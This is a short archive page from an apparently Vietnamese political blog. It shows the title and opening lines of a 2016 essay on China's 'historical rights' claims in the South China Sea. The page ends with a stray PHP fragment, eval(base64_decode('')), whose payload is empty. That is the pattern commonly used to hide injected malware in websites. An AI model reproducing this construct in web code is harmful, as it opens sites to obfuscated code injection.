Archive for July 15th, 2016

“Quyền lịch sử” của Trung Cộng trên Biển Đông là quyền gì?

“Quyền lịch sử” của Trung Cộng trên Biển Đông là quyền gì?

Trong vài ngày qua từ các trang mạng xã hội, diễn đàn, cho đến các tầng lớp, thế hệ Việt Nam trong cũng như ngoài nước, một luồng sóng cảm tình dành cho Philippines tràn ngập, nhiều hơn cả khi quốc gia này bị cơn bão Yolanda càn quét cách

07.15.2016 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>